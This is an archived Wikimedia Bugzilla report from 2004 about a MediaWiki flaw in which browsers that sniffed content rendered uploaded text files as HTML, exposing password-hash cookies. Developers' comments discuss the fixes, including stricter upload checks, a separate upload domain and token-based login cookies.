Last modified: 2005-07-14 05:30:18 UTC

Wikimedia Bugzilla is closed!

Wikimedia has migrated from Bugzilla to Phabricator. Bug reports should be created and updated in Wikimedia Phabricator instead. Please create an account in Phabricator and add your Bugzilla email address to it.
Wikimedia Bugzilla is read-only. If you try to edit or create any bug report in Bugzilla you will be shown an intentional error message.
In order to access the Phabricator task corresponding to a Bugzilla report, just remove "static-" from its URL.
You could still run searches in Bugzilla or access your list of votes but bug reports will obviously not be up-to-date in Bugzilla.
Bug 566 - serious security bug in mediawiki (Yaohua2000)
serious security bug in mediawiki (Yaohua2000)
Product: MediaWiki
Classification: Unclassified
General/Unknown (Other open bugs)
All All
: High major (vote)
: ---
Assigned To: Nobody - You can work on this!
Depends on:
Blocks: javascript
  Show dependency treegraph
Reported: 2004-09-23 10:59 UTC by Jerome Jamnicky
Modified: 2005-07-14 05:30 UTC (History)
0 users

See Also:
Web browser: ---
Mobile Platform: ---
Assignee Huggle Beta Tester: ---


Description Jerome Jamnicky 2004-09-23 10:59:55 UTC
There is some kind of problem where someone may steal the md5 hash of your 
password, apparently.  It was reported by Yaohua2000 on #mediawiki but he 
cannot use bugzilla.  He gave this URL:
Comment 1 Domas Mituzas 2004-09-23 11:02:17 UTC
well, servers give out Content-type: text/plain, so that is a flaw of a browser,
if it handles non-text/html documents as html. On the other hand, all downloads
might be served from *, so *wikipedia or *wikimedia cookies
would not apply.
Comment 2 Jamesday 2004-09-23 12:17:11 UTC
Reporter noted that "I've tested on opera,safari,ie,camino (mac os x) and ie
(win32) and mozilla,konqueror (linux) only ie (on both mac and win32) and safari
with the problem".

Users of the affected browsers should not vie wthe text file - their password
will be stolen if they do. Changing password before you view it will cause the
new one to be stolen instead, then you can change back later.
Comment 3 Brion Vibber 2004-10-10 09:25:54 UTC
Apparently no one remembered to update this bug report...

1.4cvs & 1.3.5 include stricter checks on uploads to help close the gaping holes
in IE, and we've moved the uploads on Wikipedia to an alternate domain for now
to reduce exposure to the main wikis.

1.4cvs now uses a generated token instead of the hashed hashed password for the
'remember my password' mode. This has also been backported to Wikipedia's
servers, but isn't yet included in 1.3 release as it makes some database
changes. This should be more secure against dictionary attacks to recover the
plaintext, but is still usable to login if you can snarf it.

In Windows XP SP2, IE now has a security option "Open files based on content,
not file extension". You might think that turning this off would close the
security hole, but unfortunately you'd be wrong; it still interprets ".txt" as
"it's okay to think this is HTML and run JavaScript, even though neither the
Content-Type header nor the 'extension' you think you see look like '.html' at
all". Sigh.

Note You need to log in before you can comment on or make changes to this bug.